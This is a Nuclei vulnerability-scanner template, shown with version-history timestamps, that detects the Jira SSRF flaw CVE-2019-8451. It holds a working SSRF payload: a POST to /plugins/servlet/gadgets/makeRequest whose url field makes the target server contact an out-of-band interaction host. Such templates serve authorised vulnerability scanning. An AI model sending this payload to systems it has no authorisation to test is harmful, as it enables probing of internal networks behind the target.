nuclei-templates/cves/2019/CVE-2019-8451.yaml

37 lines
1.2 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-8451
info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: TechbrunchFR
severity: medium
description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability
due to a logic bug in the JiraWhitelist class.
reference:
2021-03-30 12:10:17 +00:00
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
2021-07-30 11:50:31 +00:00
- https://hackerone.com/reports/713900
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2019-8451
cwe-id: CWE-918
tags: cve,cve2019,atlassian,jira,ssrf,oast
requests:
2021-07-30 11:50:31 +00:00
- method: POST
path:
2021-07-30 11:50:31 +00:00
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
2021-07-30 12:05:48 +00:00
2021-08-01 19:57:40 +00:00
body: |
url=https://{{Host}}:443@{{interactsh-url}}
2021-08-01 19:57:40 +00:00
headers:
X-Atlassian-Token: no-check
2021-07-30 11:50:31 +00:00
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
2021-07-30 11:50:31 +00:00
part: interactsh_protocol
words:
2021-08-01 20:00:00 +00:00
- "http" # Confirms the HTTP Interaction